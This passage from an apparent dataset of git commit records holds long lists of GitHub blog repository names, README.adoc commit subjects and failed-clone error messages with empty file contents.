\/ucide-coruptia.ro,sharmivssharmi\/sharmipress,cmolitor\/blog,mufarooqq\/blog,christofmarti\/blog,alexhanschke\/hubpress.io,dawn-chiniquy\/clear-project.org,nicksam112\/nicksam112.github.io,ReadyP1\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,gogonkt\/makenothing,lawrencetaylor\/hubpress.io,amberry\/blog,gilangdanu\/blog,envyen\/blog,fwalloe\/infosecbriefly,ashalkhakov\/hubpress.io,ErJ101\/hbspractise,discimport\/blog.discimport.dk,gsha0\/hubpress.io,xinmeng1\/note,loetjoe\/blog,rh0\/the-myriad-path,OlympusOnline2\/announcements,mimiz\/mimiz.github.io,atomfrede\/shiny-adventure,liyucun\/blog,joescharf\/joescharf.github.io,thaibeouu\/blog,jerometambo\/blog,matthardwick\/hubpress.io,miroque\/shirokuma,crotel\/studio,ruaqiwei23\/blog,wzzrd\/hubpress.io,OdieD8\/hubpress.io,Jekin6\/blog,celsogg\/blog,puff-tw\/hubpress.io,alexknowshtml\/thebigmove,jsiu22\/blog,duggiemitchell\/JavascriptMuse,trangunghoa\/hubpress.io,lawrencetaylor\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,binout\/javaonemorething,manelvf\/blog,gscheibel\/blog,mairandomness\/randomblog,pdudits\/pdudits.github.io,brendena\/hubpress.io,rorohiko21\/blog,ambarishpande\/blog,jcsirot\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,MinxianLi\/hubpress.io,kobusb\/blog,lichengzhu\/blog,diodario\/hubpress.io,mcornell\/OFM,btsibr\/myhubpress,jlcurty\/jlcurty.github.io-,akhmetgali\/hubpress.io,danen-carlson\/blog,sebprev\/blog,mikqi\/blog,DavidTPate\/davidtpate.com,Sth0nian\/hubpress.io,aspick\/hubpress.io,hiun\/hubpress.io,ncomet\/asciiblog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,kobusb\/blog,shinnoki\/hubpress.io,jlcurty\/jlcurty.github.io-,PerthHackers\/blog,mufarooqq\/blog,sebarid\/pages,JacobSamro\/blog,Evolution2626\/blog,erramuzpe\/gsoc2016,metadevfoundation\/metadevfoundation.github.io,filipeuva\/filipeuva.blog,seturne\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,miroque\/shirokuma,kornel661\/blog-test-jm,rorohiko21\/blog,JacobSamro\/blog,ciena-blueplanet\/developers.blog,devananda\/devananda.github.io,Jason2013\/hubpress,victorcouste\/blog,pramodjg\/articles,sakkemo\/blog,MirumSG\/agencyshowcase,pramodjg\/articles,isaacriquelme\/endata.do,aql\/hubpress.io,hiun\/hubpress.io,AnassKartit\/anasskartit.github.io,willcrisis\/www.willcrisis.com,whelamc\/life,nandansaha\/AroundTheWeb,baocongchen\/blogs,ashalkhakov\/hubpress.io,e-scape\/blog,palaxi00\/palaxi00.github.io,apoch\/blog,ludolphus\/hubpress.io,RussellSnyder\/hubpress-test,Red5\/red5.github.io,arabindamoni\/hubpress.io,OdieD8\/hubpress.io,TeksInHelsinki\/en,koter84\/blog,alexknowshtml\/thebigmove,qingyuqy\/qingyuqy.io,loetjoe\/blog,Codearte\/hubpress.io,abesn\/hubpress.io,Perthmastersswimming\/hubpress.io,fw4spl-org\/fw4spl-blog,shunkou\/blog,shinnoki\/hubpress.io,pepite\/hubpress.io,eimajenthat\/hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,jamarortiz\/pragmaticalware,mrfgl\/blog,artavels\/pages,bemug\/devblog,dmacstack\/glob,brendena\/hubpress.io,sakkemo\/blog,semarium\/blog,Jekin6\/blog,setupminimal\/blog,Nepal-Blockchain\/danphe-blogs,ucide-coruptia\/ucide-coruptia.ro,entropyz\/blog,Cribstone\/humblehacker,lrabiet\/patisserie,sanctumware\/hubpress,sebarid\/pages,abesn\/hubpress.io,mcrotty\/hubpress.io,pej\/hubpress.io,laibaogo\/hubpress.io,josegomezr\/blog,rubyinhell\/hubpress.io,SnorlaxH\/blog.urusa.me,Lukas238\/the-holodeck,berryzed\/tech-blog,eimajenthat\/hubpress.io,mrfgl\/blog,setupminimal\/blog,ReadyP1\/hubpress.io,ml4den\/hubpress,iKnowMagic\/hubpress.io,jabbytechnologies\/blog,pramodjg\/articles,envyen\/blog,rrrhys\/blog.codeworkshop.com.au,TeksInHelsinki\/en,thesagarsutar\/hubpress,jerometambo\/blog,rynop\/rynop.hubpress.io,tmdgus0118\/blog.code404.co.kr,jerometambo\/blog,baocongchen\/blogs,simonturesson\/hubpresstestsimon,errorval\/blog,simpleHoChun\/blog,Nepal-Blockchain\/danphe-blogs,pdudits\/pdudits.github.io,matthardwick\/hubpress.io,sidorares\/sidorares.github.io,liyucun\/blog,erramuzpe\/gsoc2016,entropyz\/blog,woehrl01\/woehrl01.hubpress.io,freekrai\/hubpress,SwarnaKishore\/blog,danen-carlson\/blog,filipeuva\/filipeuva.blog,OlympusOnline2\/announcements,joescharf\/joescharf.github.io,heartnn\/hubpress.io,paolo215\/blog,JohanBrunet\/hubpress.io,kobusb\/blog,jpcanovas\/myBlog,binout\/javaonemorething,puff-tw\/hubpress.io,tmdgus0118\/blog.code404.co.kr,joshuarrrr\/hubpress.io,lichengzhu\/blog,Bloggerschmidt\/bloggerschmidt.de,jabbytechnologies\/blog,atomfrede\/shiny-adventure,IEEECompute\/blog,rrrhys\/blog.codeworkshop.com.au,ambarishpande\/blog,DaOesten\/hubpress.io,henryouly\/henryouly.github.io,mkc188\/hubpress.io,apoch\/blog,mcrotty\/hubpress.io,AnassKartit\/anasskartit.github.io,nicolaschaillot\/pechdencouty,leomedia\/blog,errorval\/blog,Evolution2626\/blog,metadevfoundation\/metadevfoundation.github.io,ruaqiwei23\/blog,hanwencheng\/Undepth,iKnowMagic\/hubpress.io,mimiz\/mimiz.github.io,jbutz\/hubpress-test,mimiz\/mimiz.github.io,Adyrhan\/adyrhan.github.io,seturne\/hubpress.io,aql\/hubpress.io,timofei7\/onroutenow,melix\/hubpress,rjhbrunt\/hubpress.io,rjhbrunt\/hubpress.io,jcsirot\/hubpress.io,MirumSG\/agencyshowcase,ErJ101\/hbspractise,fwalloe\/infosecbriefly,dsuryakusuma\/dsuryakusuma.github.io,semarium\/blog,ReadyP1\/hubpress.io,benignbala\/hubpress.io,sebarid\/pages,nandansaha\/AroundTheWeb,erramuzpe\/gsoc2016,lrabiet\/patisserie,jerometambo\/blog,thesagarsutar\/hubpress,arseniuss\/blog.arseniuss.id.lv,entropyz\/blog,porolakka\/hubpress.io,jmini\/hubpress.io,pramodjg\/articles,rynop\/rynop.hubpress.io,ottoandry\/ottoandry1,codelab-lbernard\/blog,jlcurty\/jlcurty.github.io-,Kyrzo\/kyrzo.github.io,fastretailing\/blog,wzzrd\/hubpress.io,PerthHackers\/blog,trangunghoa\/hubpress.io,apoch\/blog,jcsirot\/hubpress.io,Astrokoala-Studio\/hubpress.io,agentmilindu\/hubpress.io,joescharf\/joescharf.github.io,igovsol\/blog,Evolution2626\/blog,Kyrzo\/kyrzo.github.io,abhayghatpande\/hubpress.io,mrtrombley\/blog,AlexL777\/hubpressblog,miroque\/shirokuma,IEEECompute\/blog,dawn-chiniquy\/clear-project.org,jsiu22\/blog,Port666\/hubpress.io,ciena-blueplanet\/developers.blog,AlexL777\/hubpressblog,fbridault\/sandblog,jfavlam\/Concepts,Lukas238\/the-holodeck,mathieu-pousse\/hubpress.io,jmnarloch\/blog.io,msavy\/rhymewithgravy.com,abhayghatpande\/hubpress.io,anandjagadeesh\/blog,pej\/hubpress.io,ruaqiwei23\/blog,anshu92\/blog,DimShadoWWW\/blog,magivfer\/pages,agentmilindu\/hubpress.io,JacobSamro\/blog,andreassiegelrfid\/hubpress.io,christofmarti\/blog,joshuarrrr\/hubpress.io,ditirambo\/ditirambo.es,redrabbit-calligraphy\/redrabbit-calligraphy-blog,Sth0nian\/hubpress.io,Jason2013\/hubpress,jabbytechnologies\/blog,mrfgl\/blog,hva314\/blog,IEEECompute\/blog,abhayghatpande\/hubpress.io,fbridault\/sandblog,ben-liu\/hubpress.io,yangsheng1107\/hubpress.io,eimajenthat\/hubpress.io,clear-project\/blog,ditirambo\/ditirambo.es,hutchr\/hutchr.github.io,crotel\/studio,adamperer\/diary,kim0\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,topicusonderwijs\/topicusonderwijs.github.io,sxgc\/blog,eimajenthat\/hubpress.io,trycrmr\/hubpress.io,rubyinhell\/hubpress.io,koter84\/blog,moonPress\/press.io,crotel\/meditation,lauesa\/Blog,atomfrede\/shiny-adventure,blackGirlsCode\/blog,Codearte\/hubpress.io,magivfer\/pages,juhuntenburg\/gsoc2017,igovsol\/blog,AirHacX\/blog.airhacx.com,MirumSG\/agencyshowcase,YvonneZhang\/yvonnezhang.github.io,hanwencheng\/hanwenblog,sharmivssharmi\/sharmipress,btsibr\/myhubpress,simonturesson\/hubpresstestsimon,topluluk\/blog,tedbergeron\/hubpress.io,mgreau\/posts,IEEECompute\/blog,kim0\/hubpress.io,erramuzpe\/gsoc2016,sakkemo\/blog,paolo215\/blog,woehrl01\/woehrl01.hubpress.io,ottoandry\/ottoandry1,JohanBrunet\/hubpress.io,moonPress\/press.io,setupminimal\/blog,rorohiko21\/blog,yangsheng1107\/hubpress.io,crotel\/meditation,kim0\/hubpress.io,liyucun\/blog,codetricity\/journey,pdudits\/pdudits.github.io,Astrokoala-Studio\/hubpress.io,csiebler\/hubpress-test,lrabiet\/patisserie,fw4spl-org\/fw4spl-blog,natsu90\/hubpress.io,tmdgus0118\/blog.code404.co.kr,palaxi00\/palaxi00.github.io,binout\/javaonemorething,arabindamoni\/hubpress.io,hanwencheng\/hanwenblog,thesagarsutar\/hubpress,MinxianLi\/hubpress.io,binout\/javaonemorething,ssundarraj\/hubpress.io,adamperer\/diary,sakkemo\/blog,crobby\/hubpress.io,pepite\/hubpress.io,benignbala\/benignbala.hubpress.io,mikqi\/blog,dmacstack\/glob,sxgc\/blog,berryzed\/tech-blog,ashalkhakov\/hubpress.io,jfavlam\/Concepts,RaoUmer\/hubpress.io,cmhgroupllc\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,rorosaurus\/hubpress.io,mrtrombley\/blog,cherurg\/hubpress.io,natsu90\/hubpress.io,gscheibel\/blog,arseniuss\/blog.arseniuss.id.lv,tom-konda\/blog,abesn\/hubpress.io,201507\/blog,tehbilly\/blog,yaks-all-the-way-down\/hubpress.github.io,diodario\/hubpress.io,yelangya3826850\/monaenhubpress,philippevidal80\/blog,adamperer\/diary,anwfr\/blog.anw.fr,pascalgrimaud\/hubpress.io,chackomathew\/blog,juhuntenburg\/gsoc2017,matthardwick\/hubpress.io,anthonny\/personal-blog,mathieu-pousse\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,nicksam112\/nicksam112.github.io,Adyrhan\/adyrhan.github.io,jmini\/hubpress.io,RussellSnyder\/hubpress-test,ice09\/ice09ng,Bloggerschmidt\/bloggerschmidt.de,trycrmr\/hubpress.io,gbougeard\/blog.english,lawrencetaylor\/hubpress.io,rynop\/rynop.hubpress.io,ambarishpande\/blog,ml4den\/hubpress,gogonkt\/makenothing,ssundarraj\/hubpress.io,cmhgroupllc\/blog,philippevidal80\/blog,kornel661\/blog-test-jm,mufarooqq\/blog,itsmyr4bbit\/blog,trangunghoa\/hubpress.io,anwfr\/blog.anw.fr,apoch\/blog,jimmidyson\/testblog,DimShadoWWW\/blog,btsibr\/myhubpress,simonturesson\/hubpresstestsimon,lawrencetaylor\/hubpress.io,flug\/flug.github.io,marksubbarao\/hubpress.io,anwfr\/blog.anw.fr,imukulsharma\/imukulsharma.github.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,demiansan\/demiansan.github.io,tehbilly\/blog,jfavlam\/Concepts,jlmcgehee21\/nooganeer,Sth0nian\/hubpress.io,moonPress\/press.io,lichengzhu\/blog,HubPress\/demo.hubpress.io,sillyleo\/bible.notes,whelamc\/life,booleanbalaji\/hubpress.io,heartnn\/hubpress.io,hiun\/hubpress.io,chackomathew\/blog,berryzed\/tech-blog,anshu92\/blog,201507\/blog,willcrisis\/www.willcrisis.com,vuthaihoc\/vuthaihoc.github.io,fghhfg\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,agentmilindu\/hubpress.io,RaoUmer\/hubpress.io,ncomet\/asciiblog,mrtrombley\/blog,AnassKartit\/anasskartit.github.io,Lukas238\/the-holodeck,pascalgrimaud\/hubpress.io,rh0\/the-myriad-path,Astrokoala-Studio\/hubpress.io,yangsheng1107\/hubpress.io,tedbergeron\/hubpress.io,imukulsharma\/imukulsharma.github.io,julianrichen\/blog,OlympusOnline2\/announcements,rorosaurus\/hubpress.io,anthonny\/personal-blog,e-scape\/blog,msavy\/rhymewithgravy.com,Cribstone\/humblehacker,plyom\/hubpress.io,sebarid\/pages,cmolitor\/blog,Adyrhan\/adyrhan.github.io,sanctumware\/hubpress,pdudits\/pdudits.github.io,ncomet\/asciiblog,msavy\/rhymewithgravy.com,trycrmr\/hubpress.io,sebprev\/blog,yaks-all-the-way-down\/hubpress.github.io,shinnoki\/hubpress.io,BenBals\/hubpress,hiun\/hubpress.io,adest\/press,ErJ101\/hbspractise,diodario\/hubpress.io,elinep\/blog,nicksam112\/nicksam112.github.io,arseniuss\/blog.arseniuss.id.lv,adjiebpratama\/press,adjiebpratama\/press,loetjoe\/blog,devananda\/devananda.github.io,josegomezr\/blog,nicolaschaillot\/pechdencouty,gogonkt\/makenothing,andreassiegelrfid\/hubpress.io,hva314\/blog,hutchr\/hutchr.github.io,jbutz\/hubpress-test,PerthHackers\/blog,hanwencheng\/hanwenblog,mcornell\/OFM,SockPastaRock\/hubpress.io,jbutz\/hubpress-test,ml4den\/hubpress,plyom\/hubpress.io,csiebler\/hubpress-test,rorosaurus\/hubpress.io,simpleHoChun\/blog,tedbergeron\/hubpress.io,laibaogo\/hubpress.io,harichen\/harichen.io,SnorlaxH\/blog.urusa.me,codelab-lbernard\/blog,Perthmastersswimming\/hubpress.io,isaacriquelme\/endata.do,tom-konda\/blog,roelvs\/hubpress.io,HubPress\/demo.hubpress.io,arseniuss\/blog.arseniuss.id.lv,TeksInHelsinki\/en,hva314\/blog,hinaloe\/hubpress,cherurg\/hubpress.io,matthardwick\/hubpress.io,nthline\/hubpress.io,flug\/flug.github.io,mcrotty\/hubpress.io,DaOesten\/hubpress.io,crotel\/studio,jcsirot\/hubpress.io,jmini\/hubpress.io,jabbytechnologies\/blog,shinnoki\/hubpress.io,Abdul2\/abdul2.github.io,sanctumware\/hubpress,akhmetgali\/hubpress.io,vuthaihoc\/vuthaihoc.github.io,RussellSnyder\/hubpress-test,koter84\/blog,Jekin6\/blog,ben-liu\/hubpress.io,jjmean2\/server-study,pdudits\/hubpress,igovsol\/blog,palaxi00\/palaxi00.github.io,joescharf\/joescharf.github.io,thaibeouu\/blog,thaibeouu\/blog,Abdul2\/abdul2.github.io,victorcouste\/blog,Nepal-Blockchain\/danphe-blogs,hanwencheng\/Undepth,manelvf\/blog,porolakka\/hubpress.io,anshu92\/blog,mcornell\/OFM,isaacriquelme\/endata.do,booleanbalaji\/hubpress.io,berryzed\/tech-blog,cherurg\/hubpress.io,thaibeouu\/blog,ditirambo\/ditirambo.es,shunkou\/blog,gbougeard\/blog.english,SwarnaKishore\/blog,juhuntenburg\/gsoc2017,chackomathew\/blog,hanwencheng\/Undepth,magivfer\/pages,nthline\/hubpress.io,sebprev\/blog,e-scape\/blog,nandansaha\/AroundTheWeb,ludolphus\/hubpress.io,RaoUmer\/hubpress.io,mairandomness\/randomblog,schweitzer\/hubpress.io,hang-h\/hubpress.io,DavidTPate\/davidtpate.com,BenBals\/hubpress,crobby\/hubpress.io,csiebler\/hubpress-test,dawn-chiniquy\/clear-project.org,laibaogo\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,miroque\/shirokuma,hang-h\/hubpress.io,ml4den\/hubpress,aql\/hubpress.io,whelamc\/life,sxgc\/blog,laibaogo\/hubpress.io,natsu90\/hubpress.io,pepite\/hubpress.io,loetjoe\/blog,marksubbarao\/hubpress.io,harichen\/harichen.io,mkc188\/hubpress.io,DaOesten\/hubpress.io,JohanBrunet\/hubpress.io,celsogg\/blog,arabindamoni\/hubpress.io,pdudits\/hubpress,hang-h\/hubpress.io,dmacstack\/glob,trycrmr\/hubpress.io,puff-tw\/hubpress.io,jpcanovas\/myBlog,sxgc\/blog,leomedia\/blog,duggiemitchell\/JavascriptMuse,SwarnaKishore\/blog,Kyrzo\/kyrzo.github.io,benignbala\/benignbala.hubpress.io,melix\/hubpress,ice09\/ice09ng,melix\/hubpress,palaxi00\/palaxi00.github.io,OdieD8\/hubpress.io,ssundarraj\/hubpress.io,fghhfg\/hubpress.io,harichen\/harichen.io,mimiz\/mimiz.github.io,nthline\/hubpress.io,AlexL777\/hubpressblog,tehbilly\/blog,baocongchen\/blogs,brendena\/hubpress.io,akhmetgali\/hubpress.io,ciena-blueplanet\/developers.blog,brieb\/hubpress.io,Jason2013\/hubpress,mgreau\/posts,aspick\/hubpress.io,OdieD8\/hubpress.io,anshu92\/blog,yelangya3826850\/monaenhubpress,qingyuqy\/qingyuqy.io,mrfgl\/blog,sillyleo\/bible.notes,Jason2013\/hubpress,metadevfoundation\/metadevfoundation.github.io,philippevidal80\/blog,ottoandry\/ottoandry1,plyom\/hubpress.io,gsha0\/hubpress.io,josegomezr\/blog,josegomezr\/blog,AnassKartit\/anasskartit.github.io,clear-project\/blog,adest\/press,sidorares\/sidorares.github.io,jlmcgehee21\/nooganeer,mufarooqq\/blog,jsiu22\/blog,amberry\/blog,princeminz\/blog,corporatesanyasi\/corporatesanyasi.github.io,SockPastaRock\/hubpress.io,mathieu-pousse\/hubpress.io,ludolphus\/hubpress.io,Lukas238\/the-holodeck,itsmyr4bbit\/blog,201507\/blog,atomfrede\/shiny-adventure,freekrai\/hubpress,tmdgus0118\/blog.code404.co.kr,ditirambo\/ditirambo.es,adjiebpratama\/press,Port666\/hubpress.io,shunkou\/blog,rorohiko21\/blog,roelvs\/hubpress.io,sharmivssharmi\/sharmipress,heartnn\/hubpress.io,anthonny\/personal-blog,akhmetgali\/hubpress.io,duggiemitchell\/JavascriptMuse,shunkou\/blog,alexknowshtml\/thebigmove,palaxi00\/palaxi00.github.io,topluluk\/blog,JiajiaGuo\/jiajiaguo.github.io,demiansan\/demiansan.github.io,AirHacX\/blog.airhacx.com,topicusonderwijs\/topicusonderwijs.github.io,blackGirlsCode\/blog,princeminz\/blog,fastretailing\/blog,PerthHackers\/blog,fw4spl-org\/fw4spl-blog,dan-blanchard\/blog,benignbala\/hubpress.io,msavy\/rhymewithgravy.com,tom-konda\/blog,mikqi\/blog,nandansaha\/AroundTheWeb,sillyleo\/bible.notes,marksubbarao\/hubpress.io,aspick\/hubpress.io,mikqi\/blog,gsha0\/hubpress.io,princeminz\/blog,baocongchen\/blogs,J0HDev\/blog,anandjagadeesh\/blog,dsuryakusuma\/dsuryakusuma.github.io,jbutz\/hubpress-test,DavidTPate\/davidtpate.com,rjhbrunt\/hubpress.io,anthonny\/personal-blog,heartnn\/hubpress.io,hinaloe\/hubpress,SnorlaxH\/blog.urusa.me,pej\/hubpress.io,mairandomness\/randomblog,iKnowMagic\/hubpress.io,schweitzer\/hubpress.io,Astrokoala-Studio\/hubpress.io,anandjagadeesh\/blog,mrtrombley\/blog,amberry\/blog,porolakka\/hubpress.io,discimport\/blog.discimport.dk,elinep\/blog,rubyinhell\/hubpress.io,clear-project\/blog,jsiu22\/blog,Evolution2626\/blog,codetricity\/journey,yelangya3826850\/monaenhubpress,crotel\/meditation,porolakka\/hubpress.io,artavels\/pages","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84627ad304a9709dfd0f02fd615f55b5b458c13f","subject":"Reformat publisher documentation","message":"Reformat publisher documentation","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd2a30ca3b9fa24a234d4c74b10c57b8c477b0e8","subject":"HTTPS for github.io","message":"HTTPS for github.io","repos":"nickwanhere\/nickwanhere.github.io,Motsai\/old-repo-to-mirror,ComradeCookie\/comradecookie.github.io,tedbergeron\/hubpress.io,abien\/abien.github.io,Murazaki\/murazaki.github.io,florianhofmann\/florianhofmann.github.io,rpawlaszek\/rpawlaszek.github.io,tongqqiu\/tongqqiu.github.io,hitamutable\/hitamutable.github.io,emtudo\/emtudo.github.io,somosazucar\/centroslibres,in2erval\/in2erval.github.io,royston\/hubpress.io,lifengchuan2008\/lifengchuan2008.github.io,juliardi\/juliardi.github.io,caryfitzhugh\/caryfitzhugh.github.io,Driven-Development\/Driven-Development.github.io,osada9000\/osada9000.github.io,livehua\/livehua.github.io,iwangkai\/iwangkai.github.io,warpcoil\/warpcoil.github.io,iveskins\/iveskins.github.io,pzmarzly\/pzmarzly.github.io,SBozhko\/sbozhko.github.io,joescharf\/joescharf.github.io,mtx69\/mtx69.github.io,s-f-ek971\/s-f-ek971.github.io,rizalp\/rizalp.github.io,der3k\/der3k.github.io,wiibaa\/wiibaa.github.io,birvajoshi\/birvajoshi.github.io,lucasferraro\/lucasferraro.github.io,srevereault\/srevereault.github.io,egorlitvinenko\/egorlitvinenko.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,Zatttch\/zatttch.github.io,davehardy20\/davehardy20.github.io,debbiezhu\/debbiezhu.github.io,psicrest\/psicrest.github.io,txemis\/txemis.github.io,alphaskade\/alphaskade.github.io,heberqc\/heberqc.github.io,zakkum42\/zakkum42.github.io,mikealdo\/mikealdo.github.io,InformatiQ\/informatiq.github.io,zestyroxy\/zestyroxy.github.io,livehua\/livehua.github.io,manueljordan\/manueljordan.github.io,lovian\/lovian.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,Brzhk\/Brzhk.github.io,rballan\/rballan.github.io,jbutzprojects\/jbutzprojects.github.io,manikmagar\/manikmagar.github.io,justafool5\/justafool5.github.io,deformat\/deformat.github.io,masonc15\/masonc15.github.io,TsungmingLiu\/tsungmingliu.github.io,jcsirot\/hubpress.io,kreids\/kreids.github.io,chrizco\/chrizco.github.io,deivisk\/deivisk.github.io,kwpale\/kwpale.github.io,foxsofter\/hubpress.io,thomaszahr\/thomaszahr.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,eyalpost\/eyalpost.github.io,metasean\/blog,murilo140891\/murilo140891.github.io,markfetherolf\/markfetherolf.github.io,fraslo\/fraslo.github.io,johnkellden\/github.io,xfarm001\/xfarm001.github.io,timelf123\/timelf123.github.io,PauloMoekotte\/PauloMoekotte.github.io,jbroszat\/jbroszat.github.io,blayhem\/blayhem.github.io,mkhymohamed\/mkhymohamed.github.io,kwpale\/kwpale.github.io,reggert\/reggert.github.io,jankolorenc\/jankolorenc.github.io,iwakuralai-n\/badgame-site,tcollignon\/tcollignon.github.io,eknuth\/eknuth.github.io,costalfy\/costalfy.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,KlimMalgin\/klimmalgin.github.io,mkorevec\/mkorevec.github.io,thykka\/thykka.github.io,vendanoapp\/vendanoapp.github.io,mdramos\/mdramos.github.io,CreditCardsCom\/creditcardscom.github.io,patricekrakow\/patricekrakow.github.io,OctavioMaia\/octaviomaia.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,jlboes\/jlboes.github.io,Olika120\/Olika120.github.io,unay-cilamega\/unay-cilamega.github.io,blater\/blater.github.io,heliomsolivas\/heliomsolivas.github.io,vendanoapp\/vendanoapp.github.io,RaphaelSparK\/RaphaelSparK.github.io,nobodysplace\/nobodysplace.github.io,RaphaelSparK\/RaphaelSparK.github.io,acristyy\/acristyy.github.io,Nil1\/Nil1.github.io,buliaoyin\/buliaoyin.github.io,in2erval\/in2erval.github.io,laura-arreola\/laura-arreola.github.io,Adyrhan\/adyrhan.github.io,niole\/niole.github.io,parkowski\/parkowski.github.io,murilo140891\/murilo140891.github.io,fbridault\/sandblog,hatohato25\/hatohato25.github.io,matthewbadeau\/matthewbadeau.github.io,gdfuentes\/gdfuentes.github.io,saiisai\/saiisai.github.io,patricekrakow\/patricekrakow.github.io,lametaweb\/lametaweb.github.io,miroque\/shirokuma,mdinaustin\/mdinaustin.github.io,concigel\/concigel.github.io,zubrx\/zubrx.github.io,ilyaeck\/ilyaeck.github.io,sskorol\/sskorol.github.io,bbsome\/bbsome.github.io,jmelfi\/jmelfi.github.io,izziiyt\/izziiyt.github.io,acristyy\/acristyy.github.io,2mosquitoes\/2mosquitoes.github.io,expelled\/expelled.github.io,hutchr\/hutchr.github.io,alchapone\/alchapone.github.io,tongqqiu\/tongqqiu.github.io,somosazucar\/centroslibres,warpcoil\/warpcoil.github.io,pdudits\/pdudits.github.io,sumit1sen\/sumit1sen.github.io,gquintana\/gquintana.github.io,tripleonard\/tripleonard.github.io,pzmarzly\/pzmarzly.github.io,daemotron\/daemotron.github.io,laposheureux\/laposheureux.github.io,alphaskade\/alphaskade.github.io,ahopkins\/amhopkins.com,GDGSriLanka\/blog,deivisk\/deivisk.github.io,hbbalfred\/hbbalfred.github.io,blater\/blater.github.io,frenchduff\/frenchduff.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,oppemism\/oppemism.github.io,Akanoa\/akanoa.github.io,pamasse\/pamasse.github.io,silviu\/silviu.github.io,PertuyF\/PertuyF.github.io,scriptindex\/scriptindex.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,xvin3t\/xvin3t.github.io,ComradeCookie\/comradecookie.github.io,tcollignon\/tcollignon.github.io,mastersk3\/hubpress.io,wols\/time,bartoleo\/bartoleo.github.io,Joemoe117\/Joemoe117.github.io,Bulletninja\/bulletninja.github.io,caryfitzhugh\/caryfitzhugh.github.io,Wurser\/wurser.github.io,raghakot\/raghakot.github.io,TommyHernandez\/tommyhernandez.github.io,vba\/vba.github.io,raisedadead\/hubpress.io,jivank\/jivank.github.io,gardenias\/sddb.com,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,tjfy1992\/tjfy1992.github.io,thrasos\/thrasos.github.io,jkschneider\/jkschneider.github.io,extrapolate\/extrapolate.github.io,nanox77\/nanox77.github.io,thomasgwills\/thomasgwills.github.io,LihuaWu\/lihuawu.github.io,lxjk\/lxjk.github.io,Tekl\/tekl.github.io,KlimMalgin\/klimmalgin.github.io,christiannolte\/hubpress.io,kfkelvinng\/kfkelvinng.github.io,wattsap\/wattsap.github.io,codingkapoor\/codingkapoor.github.io,plaidshirtguy\/plaidshirtguy.github.io,cncgl\/cncgl.github.io,kai-cn\/kai-cn.github.io,skeate\/skeate.github.io,wink-\/wink-.github.io,psicrest\/psicrest.github.io,jmelfi\/jmelfi.github.io,luzhox\/mejorandola.github.io,wink-\/wink-.github.io,Ugotsta\/Ugotsta.github.io,conchitawurst\/conchitawurst.github.io,14FRS851\/14FRS851.github.io,pzmarzly\/g2zory,silesnet\/silesnet.github.io,jaredmorgs\/jaredmorgs.github.io,mrcouthy\/mrcouthy.github.io,blahcadepodcast\/blahcadepodcast.github.io,juliosueiras\/juliosueiras.github.io,neocarvajal\/neocarvajal.github.io,ecommandeur\/ecommandeur.github.io,emilio2hd\/emilio2hd.github.io,wayr\/wayr.github.io,sidemachine\/sidemachine.github.io,jelitox\/jelitox.github.io,hbbalfred\/hbbalfred.github.io,noahrc\/noahrc.github.io,xfarm001\/xfarm001.github.io,anshu92\/blog,sandersky\/sandersky.github.io,tofusoul\/tofusoul.github.io,darsto\/darsto.github.io,yahussain\/yahussain.github.io,rishipatel\/rishipatel.github.io,CBSti\/CBSti.github.io,smirnoffs\/smirnoffs.github.io,scriptindex\/scriptindex.github.io,timelf123\/timelf123.github.io,devananda\/devananda.github.io,cmosetick\/hubpress.io,mikealdo\/mikealdo.github.io,tamakinkun\/tamakinkun.github.io,PertuyF\/PertuyF.github.io,KozytyPress\/kozytypress.github.io,dvmoomoodv\/hubpress.io,imukulsharma\/imukulsharma.github.io,msravi\/msravi.github.io,alchemistcookbook\/alchemistcookbook.github.io,datumrich\/datumrich.github.io,simevidas\/simevidas.github.io,sinemaga\/sinemaga.github.io,carsnwd\/carsnwd.github.io,kimkha-blog\/kimkha-blog.github.io,scholzi94\/scholzi94.github.io,iveskins\/iveskins.github.io,fgracia\/fgracia.github.io,minditech\/minditech.github.io,PauloMoekotte\/PauloMoekotte.github.io,lerzegov\/lerzegov.github.io,xumr0x\/xumr0x.github.io,caglarsayin\/hubpress,hoernschen\/hoernschen.github.io,amodig\/amodig.github.io,crimarde\/crimarde.github.io,hfluz\/hfluz.github.io,scriptindex\/scriptindex.github.io,demo-hubpress\/demo,hapee\/hapee.github.io,mouseguests\/mouseguests.github.io,chdask\/chdask.github.io,fuzzy-logic\/fuzzy-logic.github.io,willnewby\/willnewby.github.io,severin31\/severin31.github.io,laposheureux\/laposheureux.github.io,jarbro\/jarbro.github.io,jcsirot\/hubpress.io,kay\/kay.github.io,jaslyn94\/jaslyn94.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,Vanilla-Java\/vanilla-java.github.io,jaredmorgs\/jaredmorgs.github.io,stevenxzhou\/alex1007.github.io,xfarm001\/xfarm001.github.io,maorodriguez\/maorodriguez.github.io,siarlex\/sia